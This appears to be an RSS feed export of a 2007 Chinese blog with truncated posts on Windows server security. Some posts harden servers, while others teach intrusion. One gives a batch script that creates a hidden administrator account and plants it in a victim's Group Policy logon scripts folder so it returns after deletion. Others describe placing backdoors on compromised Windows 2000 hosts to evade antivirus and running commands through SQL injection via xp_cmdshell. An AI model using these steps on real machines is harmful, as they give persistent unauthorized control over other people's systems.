溢出我心 http://darkydays.blogbus.com by blogbus.com Thu, 01 Jan 1970 07:00:00 +0700 http://public.blogbus.com/profile/8/2/6/1403628/avatar_1403628_96.jpg 溢出我心 http://darkydays.blogbus.com 服务器安全设置技术实例
1、服务器安全设置之--硬盘权限篇

这里着重谈需要的权限,也就是最终文件夹或硬盘需要的权限,可以防御各种木马入侵,提权攻击,跨站攻击等。本实例经过多次试验,安全性能很好,服务器基本没有被木马威胁的担忧了。

硬盘或文件夹: C:\ D:\ E:\ F:\ 类推
主要权限部分: 其他权限部分:
Administrators 完全控制 无
如果安装了其他运行环境,比如PHP等,则根据PHP的环境功能要求来设置硬盘权限,一般是安装目录加上...

收藏到:Del.icio.us


博客大巴,你的个人传媒早班车


]]> http://darkydays.blogbus.com/logs/6701703.html 野鸡 Sat, 14 Jul 2007 23:28:47 +0800 突破3389多用户登录
mstsc /console /v:IP:终端端口

收藏到:Del.icio.us


博客大巴,你的个人传媒早班车


]]> http://darkydays.blogbus.com/logs/6701290.html 野鸡 Sat, 14 Jul 2007 23:21:33 +0800 服务器安全设置之--硬盘权限篇
主要权限部分:
其他权限部分:
Administrators
完全控制
Users
读取

该文件夹,子文件夹及文件

该文件夹,子文件夹及文件


SYSTEM
完全控制


该文件夹,子文件夹及文件

硬盘或文件夹: C:\Documents and Settings

主要权限部分:
其他权限部分:
Administrators
完全控制



该文件夹,子文件夹及文件

SYSTE...

收藏到:Del.icio.us


博客大巴,你的个人传媒早班车


]]> http://darkydays.blogbus.com/logs/6701248.html 野鸡 Sat, 14 Jul 2007 23:18:45 +0800 给别人电脑永远设置个别人删不掉的管理员用户 1、在自己电脑里面建立一个.txt文本文件.
2、在里面输入内容
@echo off
net user xixi 123456 /add 注释:前面xixi是用户名后面123456是密码;
net localgroup administrators xixi /add

3、把这个文件保存,更改后缀为xixi.bat 注释:前面名字随便,后面格式一定要是bat;
4、把这个文件拷贝到对方电脑C:\WINNT\system32\GroupPolicy\User\Scripts\Logon文件目录下,没有的话自己创建。
完成,下次对方电脑无论如何都有这个管理员帐号,删除了,下次启动还有!
如果把里面的内容改成
@echo off
net user ad...

收藏到:Del.icio.us


博客大巴,你的个人传媒早班车


]]> http://darkydays.blogbus.com/logs/6701106.html 野鸡 Sat, 14 Jul 2007 23:15:24 +0800 XFocus Windows Internet服务器安全配置
1)Windows Server 2003, Standard Edition (标准版)

针对中小型企业的核心产品,他也是支持双路处理器,4GB的内存。它除了具备 Windows Server 2003 Web Edition 所有功能外,还支持像证书服务、UDDI服务、传真服务、IAS因特网验证服务、可移动存储、RIS、智能卡、终端服务、WMS和 Services for Macintosh。

支持文件和打印机共享。 提供安全的网络联接。


2)Windows Server 2003, Enterprise Edition (企业版)

这个产品被定义为新一带高端产品,它最多能够支持8路处理器,32 GB内存,和28个节点的集群。它是 ...

收藏到:Del.icio.us


博客大巴,你的个人传媒早班车


]]> http://darkydays.blogbus.com/logs/6700957.html 野鸡 Sat, 14 Jul 2007 23:13:42 +0800 win2003安全设置批处理 echo ------------------------------------------------------
echo.
echo ...........
echo.
net share c$ /delete
net share d$ /delete
net share e$ /delete
net share f$ /delete
net share admin$ /delete
net share ipc$ /delete
net stop server
net stop lanmanworkstation


regsvr32/u C:\WINDOWS\System32\wshom.ocx
regs...

收藏到:Del.icio.us


博客大巴,你的个人传媒早班车


]]> http://darkydays.blogbus.com/logs/6700921.html 野鸡 Sat, 14 Jul 2007 23:12:40 +0800 猪头三的服务器安全配置说明
一.磁盘权限的设置

c:\
Administrators 完全控制
System 完全控制
Users 读取 读取运行 列出文件夹目录(为了让防盗链能正常运行)
Guest 拒绝所有权限.并只应用到“只有该文件夹”

C:\Documents and Settings
Administrators 完全控制
System 完全控制

C:\Documents and Settings\All Users
Administrators 完全控制
System 完全控制

C:\php
读取 读取运行...

收藏到:Del.icio.us


博客大巴,你的个人传媒早班车


]]> http://darkydays.blogbus.com/logs/6700891.html 野鸡 Sat, 14 Jul 2007 23:11:21 +0800 调用nc做嗅探的一个bat shell :: Ncfoever 1.0 bulid by ALLyeSNO 2005-06-13
:: 可用于tcp端口数据包的捕获
cls
::/* 参数判断以及使用说明 */
set count=1
if /i "%1"=="-look" goto nclook
if /i "%1"=="-log" goto nclog
echo.
echo =======================================================================
echo Ncforever 1.0 build by ALLyeSNO
echo...

收藏到:Del.icio.us


博客大巴,你的个人传媒早班车


]]> http://darkydays.blogbus.com/logs/6615386.html 野鸡 Wed, 11 Jul 2007 16:39:44 +0800 入侵Win2000放置后门的方法
目前一般情况下,入侵Windows2000后使用最多的后门是RemoteNc了,但该工具有一很大的缺点,容易被杀毒软件查出,而且如果用Fport或Active Ports等软件也可以看到它监听的端口,这很容易让管理员发现。

对于Windows2000下的后门推荐使用Windows2000 Resoruce Kit中自带的一个小工具Rcmdsvc.exe和Rcmd.exe,这是微软自己出的一个用来在命令行下远程管理主机的小工具。它有以下优点:
1、不会被杀毒软件认为是病毒或后门程序,毕竟这是微软自己出的东西。

收藏到:Del.icio.us


博客大巴,你的个人传媒早班车


]]> http://darkydays.blogbus.com/logs/6615213.html 野鸡 Wed, 11 Jul 2007 16:29:58 +0800 不需xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD命令
作者貌似是isno~硬盘文。方法大家都会偶拖出来看思路滴。

最让人感兴趣的也许就是前面介绍的利用扩展存储过程xp_cmdshell来运行操作系统的控制台命令。这种方法也非常的简单,只需使用下面的SQL语句:

EXEC master.dbo.xp_cmdshell ‘dir c:\‘

但是越来越多的数据库管理员已经意识到这个扩展存储过程的潜在危险,他们可能会将该存储过程的动态链接库xplog70.dll文件删除或改了名,这时侯许多人也许会放弃,因为我们无法运行任何的cmd命令,很难查看对方计算机的文件、目录、开启的服务,也无法添加NT用户。

对此作过一番研究,后来我发现即使xp_cmdshell不可用了,还是有可能在服务器上运行CMD并得到回显结果的...

收藏到:Del.icio.us


博客大巴,你的个人传媒早班车


]]> http://darkydays.blogbus.com/logs/6177413.html 野鸡 Wed, 27 Jun 2007 22:32:32 +0800